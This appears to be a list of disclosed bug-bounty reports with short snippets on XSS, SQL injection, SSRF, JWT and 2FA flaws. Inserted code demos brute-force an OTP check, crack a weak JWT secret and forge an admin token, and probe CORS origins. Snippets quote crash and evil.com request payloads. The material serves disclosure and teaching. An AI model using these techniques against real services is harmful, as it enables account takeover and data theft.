15267 matches found
Mail.ru: A user can change the phone number in their profile without SMS confirmation
SMS code for phone number change in zakazaka.ru was not sufficiently protected against bruteforce...
Mail.ru: Brute force of the SMS confirmation code for changing the phone number in a LootDog account.
SMS code for phone number change in lootdog.io was not sufficiently protected against bruteforce...
U.S. Dept Of Defense: Stored XSS at ██████userprofile.aspx
Summary: Stored XSS vulnerability exists at ██████████userprofile.aspx under "say something about yourself...". XSS can be used for a variety of attacks. Impact XSS can be used to steal cookies, password or to run arbitrary code in the victim's browser. Step-by-step Reproduction Instructions 1...
Mail.ru: Redmin API Key Exposed In GitHub
Sensitive application configuration data related to tracker.ucs.ru was leaked on github.com...
Mail.ru: Reflected XSS on http://info.ucs.ru/settings/check/
Reflected XSS due to unsafe usage of POST parameter in info.ucs.ru...
Mail.ru: Blind SSRF on http://info.ucs.ru/settings/check/
Blind SSRF in info.ucs.ru...
Mail.ru: [self?] XSS in the user's address [sbermarket.ru]
Stored self-XSS via delivery address in sbermarket.ru...
Mail.ru: Logs/SQL queries on http://mx36.ucs.ru/ and reflected XSS.
Sensitive application information disclosure and stored XSS via log files on mx36.ucs.ru...
Mail.ru: SQL Injection at https://lite.r-keeper.ru/site_api/clients/derision/?lang=ru
SQL Injections in lite.r-keeper.ru due to unsafe usage of URI parameters...
Mail.ru: SQL Injection at https://lite.r-keeper.ru/site_api/localize/translate/rklscommon/ru
SQL Injection in lite.r-keeper.ru due to unsafe usage of PATH from GET Request...
PlayStation: Reflected XSS on transact.playstation.com using postMessage from the opening window
Report Summary: When transact.playstation.com loads it handles messages received from postMessage in the receiveMessageFromTransactClientService method. The only validation that is performed is to ensure that the referrer and origin match: receiveMessageFromTransactClientService:...
Mail.ru: SSRF at jira.plazius.ru - CVE-2019-8451
SSRF via CVE-2019-8451 in jira.plazius.ru due to unpatched Jira version...
Mail.ru: xss on [storehouse5.ucs.ru]
Reflected XSS via POST parameter in storehouse5.ucs.ru...
Open-Xchange: Buffer over read from `smtp_command_parse_parameters`
Function `smtp_command_parse_parameters` calls `uni_utf8_get_char_n` with length parameter `(size_t)(p - parser->end)` when the parameter should be `(size_t)(parser->end - p)`. To reproduce, send as input to the SMTP server 8191 spaces followed by the beginning of one unicode character: `printf ' %8190s\xdc' " " | nc localhost`...
Mail.ru: Stored XSS that allow an attacker to read victim mailboxes contacts in mail.ru and my.com application
Mail.ru Mail iOS app was vulnerable to local file access on some iOS versions due to cross-application scripting if a maliciously crafted SVG attachment is viewed by the user. Write-up is here...
U.S. Dept Of Defense: Unrestricted File Upload Leads to XSS & Potential RCE
Summary: Unrestricted file upload at████████/request?openform. When the user wants to upload a file the app allows the user to upload a HTML file leading to stored XSS and creation of a simple php script. A user can upload the HTML file and trigger XSS and trigger potential RCE with php shell...
U.S. Dept Of Defense: PII Leak (such as CAC User ID) at https://████████/pages/login.aspx
Summary: An attacker can create an account on https://█████/pages/login.aspx and gain access to a wealth of PII for practically every member that is registered on the website. This information that the attacker has access to includes usernames, CAC User ID's, e-mail addresses, telephone numbers,...
U.S. Dept Of Defense: Subdomain takeover of ████
Summary: I was able to claim the subdomain: ████ using Microsoft Azure CDN profiles Description: Impact Platforms Affected: Subdomain Azure CDN Step-by-step Reproduction Instructions 1. Using dig, I was able to determine that the subdomain '███████' was vulnerable to takeover. The record showed...
Rocket.Chat: XSS leads to RCE on the RocketChat desktop client.
Summary: It is possible to call electron.shell.openExternal from javascript inside a server webview. Description: The document onclick handler allows executing electron.shell.openExternal by crafting an attacker-controlled link and dispatching a click event on it after overwriting Regex.test...
Rocket.Chat: XSS in message attachment fields.
NOTE! Thanks for submitting a report! Please replace all the square sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty, so be sure to take your time filling out the report! Summary: There is a...
Kubernetes: Man in the middle leading to root privilege escalation using hostNetwork=true (CAP_NET_RAW considered harmful)
Summary: CAP_NET_RAW capability is still included by default in K8S, leading to yet another attack. An attacker gaining access to a hostNetwork=true container with CAP_NET_RAW capability can listen to all the traffic going through the host and inject arbitrary traffic, allowing to tamper with most...
Ruby on Rails: Untrusted users able to run pending migrations in production
Untrusted users able to run pending migrations in production There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed an untrusted user to run any pending migrations on a Rails app running in production. This vulnerability has been assigned the CVE identifier CVE-2020-XXXX...
Shopify: Password reset link not expired at Stocky App
You can use password reset link to reset password multiple times. Steps: 1. Go to https://stocky.shopifyapps.com/users/forgottenpassword and Send the password reset link to your email. if this page doesn't appear you should add login details via this https://stocky.shopifyapps.com/preferences/use...
Open-Xchange: Out of memory with combination of `test_config_set` and `test_config_reload`
Running testsuite on input: require "vnd.dovecot.testsuite"; require "variables"; require "editheader"; test_set "message" "$message"; test "Default protected" if not exists "received" test_fail "received header did not exist in the first place"; test_config_set "sieve_editheader_protected" "Àubject...
Ruby: DRb denial of service vulnerability
It is possible to crash the DRb server by providing malformed input. By following the DRb example https://ruby-doc.org/stdlib-2.7.0/libdoc/drb/rdoc/DRb.html#module-DRb-label-Server+code the simple server and client code attached was created: drbserver.rb drbclient.rb. The client code was modified to...
Shopify: GraphQL AdminGenerateSessionPayload is leaked to staff with no permission
@hiffley reported the ability to generate app tokens via the adminGenerateSession mutation in Shopify Admin, as a staff member with no permissions. This allowed for accessing a small subset of installed apps that are using this new flow including Shopify Email. Access was limited to the current...
Mail.ru: Source code and internal credentials disclosure
Sensitive application configuration data disclose on registry.infra.mail.ru...
Mail.ru: Reflected XSS in "keywords" parameter at "https://sbermarket.ru/metro/search"
Reflected XSS via GET parameter in sbermarket.ru...
Mail.ru: Exposed admin panel of the 1C emulator
Staging/testing versions of the 1C-emulator and Adminer interfaces were available from the external network without authentication on geekbrains.ru. These interfaces had no access to production data...
Node.js third-party modules: Arbitrary code execution via untrusted schemas in ajv
I would like to report an arbitrary code execution vulnerability in ajv. It allows to execute arbitrary code if an attacker-controlled schema is passed to the module. I have confirmed that this should be treated as a security issue. I labeled this as low because this is an unusual scenario, usual...
Nintendo: [3DS][SSL][SDK] Unchecked number of audio channels in Mobiclip SDK leads to RCE in eShop movie player
Affected Systems - Platform: New Nintendo 3DS - Region: ALL - System version: 11.13 latest at the time of writing Description The Mobiclip SDK used for parsing moflex videos does not check the number of audio channels in an audio stream. This leads to a miscalculation of free space remaining in a...
Greenhouse.io: SSH port on store.greenhouse.io is vulnerable to brute force attacks
Open SSH port found on third party vendor...
Visma Public: Stored XSS in eaccounting.stage.vismaonline.com
The security researcher was able to find a Stored XSS Cross-site scripting vulnerability on the eaccounting.stage.vismaonline.com domain. This causes arbitrary javascript execution on the victim's browser. The severity of this vulnerability has been evaluated as medium...
Glassdoor: 2FA bypass by sending blank code
Summary: █████████. This is a failure in null check of the entered code. In simple terms, the 2FA while logging in can be bypassed by sending a blank code. This could be because of incorrect comparison of entered code with true code. A pre-validation may be null check before comparing the codes...
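Added example, not code from the Glassdoor report above or from the Mail.ru SMS brute-force reports near the top of this list: an OTP/2FA verifier written with the "missing null check" pattern (a falsy code skips the comparison) next to a hardened one that validates the format, compares in constant time and caps attempts, plus a constructed brute-force loop showing why the attempt cap matters for a 6-digit SMS code. Class and function names, the 6-digit format and the attempt limit of 5 are assumptions for the demo.

```python
"""Constructed OTP verification demo: fail-open blank-code bug vs hardened check."""
import hmac
import re


class VulnerableOtpCheck:
    """Mirrors the bug class in the report: a blank or None code never reaches the compare."""

    def __init__(self, expected: str):
        self.expected = expected

    def verify(self, submitted) -> bool:
        # Bug: "" and None are falsy, so the guard short-circuits and the function
        # falls through to "success" without ever comparing against the real code.
        if submitted and submitted != self.expected:
            return False
        return True


class HardenedOtpCheck:
    """Explicit format check, constant-time compare, and an attempt cap per issued code."""

    MAX_ATTEMPTS = 5  # assumed policy; after this the code must be reissued

    def __init__(self, expected: str):
        self.expected = expected
        self.attempts = 0

    def verify(self, submitted) -> bool:
        if self.attempts >= self.MAX_ATTEMPTS:
            return False  # locked out; a fresh code has to be sent
        self.attempts += 1
        # Reject anything that is not exactly six ASCII digits before comparing,
        # so blank, None, or oversized input can never be treated as a match.
        if not isinstance(submitted, str) or not re.fullmatch(r"[0-9]{6}", submitted):
            return False
        return hmac.compare_digest(submitted.encode("ascii"), self.expected.encode("ascii"))


def brute_force(check, digits: int = 6, limit: int = 10**6):
    """Try codes in ascending order; return (found_code, attempts_used) or (None, limit)."""
    for n in range(limit):
        code = f"{n:0{digits}d}"
        if check.verify(code):
            return code, n + 1
    return None, limit


if __name__ == "__main__":
    secret_code = "004242"  # constructed code a server would have SMS'd to the victim
    print("vulnerable accepts blank:", VulnerableOtpCheck(secret_code).verify(""))
    print("hardened accepts blank:", HardenedOtpCheck(secret_code).verify(""))
    print("brute force vs vulnerable:", brute_force(VulnerableOtpCheck(secret_code)))
    print("brute force vs hardened:", brute_force(HardenedOtpCheck(secret_code), limit=10000))
```

Against the vulnerable verifier the loop recovers the code after a few thousand requests; against the hardened one every attempt after the fifth is refused regardless of the code, which is the property the zakazaka.ru and lootdog.io reports say was missing.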
Zivver: XXE Injection through SVG image upload leads to SSRF
While uploading photos to my profile picture, I noticed that if I included an svg image, your server would parse and upload it to my profile. Through this, I explored more and found that this same functionality was also vulnerable to an XXE attack, where I could define my own entities, and your...
Mail.ru: [smena.samokat.ru] Predictable JWT secret
Default secret value was used for JWT generation by smena.samokat.ru. What can go wrong if the JWT HS256 secret value is "secret" 😀...
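Added example, not code from the smena.samokat.ru report or from the site: a stdlib-only HS256 signer/verifier, an offline dictionary attack that recovers a weak secret from any valid token, and the forged admin token that follows. The claims, the five-word wordlist and the server secret `secret` are constructed for the demo; the helper names are assumptions.

```python
"""Constructed demo: a default HS256 secret lets anyone holding one token mint their own."""
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_hs256_sign(claims: dict, secret: bytes) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    return f"{header}.{payload}.{_b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())}"


def jwt_hs256_verify(token: str, secret: bytes):
    """Return the claims if the token is a valid HS256 JWT under `secret`, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        if header.get("alg") != "HS256":  # pin the algorithm: no "none", no RS256 key confusion
            return None
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        return json.loads(_b64url_decode(payload_b64))
    except (ValueError, UnicodeDecodeError):
        return None


def recover_hs256_secret(token: str, candidates):
    """Offline dictionary attack: a single valid token is the only oracle needed."""
    for cand in candidates:
        if jwt_hs256_verify(token, cand.encode()) is not None:
            return cand
    return None


WEAK_SECRETS = ["changeme", "password", "secret", "jwt_secret", "123456"]  # constructed wordlist


def demo():
    """Returns (recovered_secret, claims the server would accept from the forged token)."""
    server_secret = b"secret"  # the kind of default value the report describes
    victim_token = jwt_hs256_sign({"sub": "courier-1042", "role": "courier"}, server_secret)
    recovered = recover_hs256_secret(victim_token, WEAK_SECRETS)
    forged = jwt_hs256_sign({"sub": "admin", "role": "admin"}, recovered.encode())
    return recovered, jwt_hs256_verify(forged, server_secret)


if __name__ == "__main__":
    print(demo())
```

The verifier pins `alg` to HS256 on purpose: accepting whatever the token's header says is the other classic JWT failure, and a weak secret combined with an unpinned algorithm is strictly worse than either alone.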
Mail.ru: Obtaining guaranteed income and bonuses without actually fulfilling orders, while using accounts of non-existent people.
Reporter demonstrated a possibility to bypass an anti-fraud protection in the Citymobil taxi service...
Nextcloud: Reflected XSS when renaming a file with a vulnerable name which results in an error
Hi, It looks like Nextcloud team will accept the XSS protected by the CSP. Report 896511 Here is another XSS. 1. Rename an existing filename to .jpg. 2. Anyone tries to rename this .jpg with an invalid filename, like add a "" in it, will trigger the XSS attack. 3. Need bypass the CSP. Thanks...
Nextcloud: XSS in image metadata field
Hi, Will you confirm the XSS vulnerability blocked by the CSP? On Nextcloud 19.0.0 1. Upload the PoC.jpg 2. Check the PoC.jpg metadata 3. Need bypass the CSP to trigger it Impact Cross-Site Scripting...
Monero: Misconfiguration in build environment allows DLL preloading attack
Summary: monero-wallet-gui.exe tries to dynamically load some dynamic link libraries (DLLs) which are not present in the application's directory, so the LoadLibraryA system call will search other directories such as the Windows root and %PATH% for them. An attacker can gain arbitrary code execution if he/she...
GitHub Security Lab: Java: CWE-297 Insecure JavaMail SSL configuration
This bug was reported directly to GitHub Security Lab...
GitHub Security Lab: CodeQL query for SpEL injections
This bug was reported directly to GitHub Security Lab...
U.S. Dept Of Defense: (CORS) Cross-origin resource sharing misconfiguration
Description: Affected website: https://██████████/wp-json Impact Step-by-step Reproduction : 1. Send this request: GET /wp-json HTTP/1.1 Host: █████████ Connection: close Origin: http://evil.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Windows NT...
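Added example, not code from the DoD report or from the affected site: the set of Origin values worth sending against an endpoint like the /wp-json one above, and a classifier for what the returned `Access-Control-Allow-Origin` / `Access-Control-Allow-Credentials` pair actually gives an attacker. The endpoint is replaced by a constructed handler that reflects any Origin, and the host name `target.example` is a placeholder, not the redacted host.

```python
"""Constructed CORS probe: which origins to try and how to read the answer."""


def probe_origins(target_host: str):
    """Origins sent one at a time; each defeats a different sloppy allowlist check."""
    return [
        "https://evil.example",                  # is anything reflected at all?
        "null",                                  # sandboxed iframes and file: pages send this
        f"https://{target_host}.evil.example",   # startswith(target_host) allowlist
        f"https://evil{target_host}",            # endswith(target_host) without a leading dot
        f"http://{target_host}",                 # same host, plaintext scheme
    ]


def evaluate_cors(origin_sent: str, response_headers: dict) -> str:
    """Classify the ACAO/ACAC pair the server returned for `origin_sent`."""
    hdrs = {k.lower(): v for k, v in response_headers.items()}
    acao = hdrs.get("access-control-allow-origin")
    creds = hdrs.get("access-control-allow-credentials", "").strip().lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        # Browsers refuse credentialed requests to "*", so only public data is readable.
        return "wildcard"
    if acao == origin_sent:
        # Reflected origin + credentials lets evil.example read authenticated responses.
        return "reflected-with-credentials" if creds else "reflected"
    return "allowlisted"


def constructed_wp_json_handler(origin: str) -> dict:
    """Stand-in for a misconfigured endpoint: echoes any Origin and allows credentials."""
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Content-Type": "application/json",
    }


def assess(target_host: str, handler) -> dict:
    """Run every probe origin through `handler` (a real run would send HTTP requests)."""
    return {origin: evaluate_cors(origin, handler(origin)) for origin in probe_origins(target_host)}


if __name__ == "__main__":
    for origin, verdict in assess("target.example", constructed_wp_json_handler).items():
        print(f"{origin:45} -> {verdict}")
```

Only "reflected-with-credentials" (or "reflected" on an endpoint whose data is tied to a session by other means) is worth a report; a bare wildcard on a public JSON endpoint is usually informational, which is the distinction a triager will ask about.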
Blueboard: path traversal vulnerability adding /████████ after ████████ and skip ██████ page.
This report has brought to light a workaround to scheduling calls with our sales team, that would allow anyone to do so without going through our dedicated marketing website's flow...
Facebook: Facebook - Reputation Sync For #267890541047618
This bug was reported directly to Facebook...
Engel & Völkers Technology GmbH: [service.engelvoelkers.com] XSS in /video/id
Summary: The YouTube video page at https://service.engelvoelkers.com/video/id/ is vulnerable to reflected XSS attacks. Description: A dynamic part of the URL is printed to the page without proper encoding, causing a reflected XSS vulnerability. Steps to reproduce Visit the following link:...
GSA Bounty: Limited LFI
Summary: Due to improper parameter sanitization local file inclusion is possible. LFI is limited as we were not able to truncate the end of string. Description: Application root is located at /var/www/dashboard/new/public Due to URL Manipulation we are able to read file from...
8x8: DOM Based XSS at docs.8x8.com
A domain for marketing documentation contained a DOM based XSS due to evaluation and rendering of window.location.href in the related javascript...
h1-ctf: [h1-2006 2020] Bounty payments are done !
Read more here! https://github.com/Louzogh/CTF-Writeup/blob/master/2020/H1-2006-CTF/README.md Hey, I've published my write-up at : https://github.com/Louzogh/CTF-Writeup/blob/master/2020/H1-2006-CTF/README.md Enjoy 😅...
h1-ctf: [H1-2006 2020] Bounty Pay CTF challenge
H1-2006 2020 Bounty Pay CTF challenge Hi there! This is my H1-2006 CTF writeup submission. First of all, thanks for the great challenge! This was my first H1 CTF that I played. I really enjoyed doing it and I learned new things solving this challenge. In my case, it was the demonstration that I...